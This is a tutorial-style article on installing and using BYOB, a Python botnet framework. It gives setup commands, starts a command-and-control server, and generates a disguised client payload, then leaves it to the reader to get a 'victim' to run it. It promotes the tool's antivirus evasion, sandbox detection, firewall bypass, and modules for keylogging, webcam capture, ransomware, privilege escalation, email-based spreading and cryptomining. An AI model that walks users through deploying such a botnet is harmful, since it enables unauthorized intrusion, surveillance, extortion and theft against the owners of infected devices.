A botnet is several Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection. The owner can control the botnet using command and control (C&C) software.
WHAT IS BYOB?
Malware has existed on the Internet since the beginning. The more new technology is developed, the more malware is complex. BYOB is a project made with Python programming language, allowing you to create your botnet within few simple steps. As described on the Github page of the project, BYOB is the abbreviation for "Build Your Botnet". This project offers security researchers and developers a structure to build and operate a simple botnet to deepen their understanding of the malware that infects millions of devices every year and sprouts new botnets to enhance their capacity for countering threats.
It is designed to allow you to easily deploy code and to add cool new features without having to write a RAT (Remote Administration Tool) or a C2 (Command & Control Server) from scratch. The project key feature is that you can upload arbitrary code/files to the target's memory remotely and run on the target machine without writing anything to the disk. This project supports Python v2/v3. BYOB can allow you to deploy Botnet on both Linux and Windows machines. In this tutorial, we will see together how to create and execute a Botnet on Linux architecture.
Client Botnet Features
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules.
- Remote Imports - Remotely import third-party packages from the server without writing them to the disk or downloading/installing them.
- Nothing Written To The Disk - Clients never write anything to the disk, not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process.
- Zero Dependencies (Not Even Python Itself) - Client runs with just the Python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone Python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host.
- Add New Features With Just 1 Click - Any Python script, module, or package you copy to the
./byob/modules/directory automatically becomes remotely importable & directly usable by every client while your command & control server is running.
- Write Your Modules - A basic module template is provided in
./byob/modules/directory to make writing your modules a straight-forward, hassle-free process.
- Run Unlimited Modules Without Bloating File Size - Use remote imports to add unlimited features without adding a single byte to the client's file size.
- Fully Updatable - Each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed.
- Platform Independent - Everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS).
- Bypass Firewalls - Clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections.
- Counter-Measure Against Antivirus - Avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning.
- Encrypt Payloads To Prevent Analysis - The main client payload is encrypted with a random 256-bit key that exists solely in the payload stager which is generated along with it.
- Prevent Reverse-Engineering - By default, clients will abort execution if a virtual machine or sandbox is detected.
Server Botnet Features
Command & control server with persistent database and console.
- Console-Based User-Interface - Streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines.
- Persistent SQLite Database - A lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance.
- Client-Server Architecture - All Python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules that require packages not installed on the target machines.
If you wish to know more about BYOB and all the available modules and the options, we highly suggest you visit the Github page of the project.
HOW TO INSTALL AND USE BYOB?
For this tutorial, I will use Arch Linux, but you can use any recent GNU/Linux distribution such as Debian, Ubuntu, Kali, etc ... We will first start by installing "BYOB" on our machine along with all the dependencies required by this tool to work properly so that we can then generate our Botnet server/clients and see together how this project works.
For Arch Linux users you will need to install first the following dependencies:
Install BYOB on Ubuntu/Debian and other derived distributions
git clone https://github.com/malwaredllc/byob
chmod +x setup.py
pip install -r requirements.txt
sudo python setup.py
Install BYOB on Arch Linux
sudo pacman -Syu base-devel hdf5 opencv opencv-samples
git clone https://github.com/malwaredllc/byob
chmod +x setup.py
pip install -r requirements.txt
STARTING THE BOTNET SERVER
Once you are done with the installation, you can start your BYOB Botnet server. Honestly, I would like to make a long story but must say the truth, that can be done very easily. The unique thing you have to do is to execute the below command in your terminal:
python server.py --port 1337
In the above example, I set up the Botnet server to listen to the port 1337 of my machine. But of course, you are free to use the port you want as long you use the same port when creating the Botnet client.
If you want to display usage information and/or all the options available, at this stage you can do it by invoking the
help command from your terminal as per the below screenshot.
CREATE A LINUX BOTNET CLIENT
We will now talk about the most important part, we will create our first Botnet client that will target Linux machine. We will see in the next step how to create a client that works on Windows also don't worry. To do this the first thing that we will need to determine is the IP address to which your Botnet Server is currently connected. If you do not know the IP address of your machine, you can simply find it using the following command:
Before moving further, we will take a few minutes to check the usage information and all the options available for our Botnet client. To do it, simply use the following command:
python client.py --help
As you can see from the above screenshot, to create our Botnet we must use the following arguments:
usage: client.py [-h] [--name NAME] [--encrypt] [Botnet Server IP] [Botnet Server Port]
So let's try to generate our first Botnet. For this tutorial, I will use it as output name
archive but of course you can name it whatever you want.
python client.py --name archive.py 192.168.1.4 1337
As you can see from the above screenshot, a file named
archive.py has been generated. I will not explain to you how to send it to your victim since this is not the purpose of this tutorial. But we can say that now the challenge for you is to send this file to your target and do whatever is necessary so that the latter executes it.
WHAT BOTNET ALLOWS ME TO DO ?
For the last part of this article, we will consider that our Botnet has been sent to our victim and that the latter had the very bad idea of clicking on it. The question you are probably asking yourself now is "What does BYOB allow me to do"? Frankly, the possibilities are quite wide since this source code allows you once to run a computer to run different modules which are:
- Keylogger - Logs the user’s keystrokes & the window name entered
- Screenshot - Take a screenshot of current user’s desktop
- Webcam - View a live stream or capture image/video from the webcam
- Ransom - Encrypt files & generate random BTC wallet for ransom payment
- Outlook - Read/search/upload emails from the local Outlook client
- Packet Sniffer - Run a packet sniffer on the host network & upload .pcap file
- Persistence - Establish persistence on the host machine using 5 different methods
- Phone - Read/search/upload text messages from the client smartphone
- Escalate Privileges - Attempt UAC bypass to gain unauthorized administrator privileges
- Port Scanner - Scan the local network for other online devices & open ports
- Process Control - List/search/kill/monitor currently running processes on the host
- iCloud - Check for logged in iCloud account on macOS
- Spreader - Spread client to other hosts via emails disguised as a plugin update
- Miner - Mine Monero in the background using the built-in miner or XMRig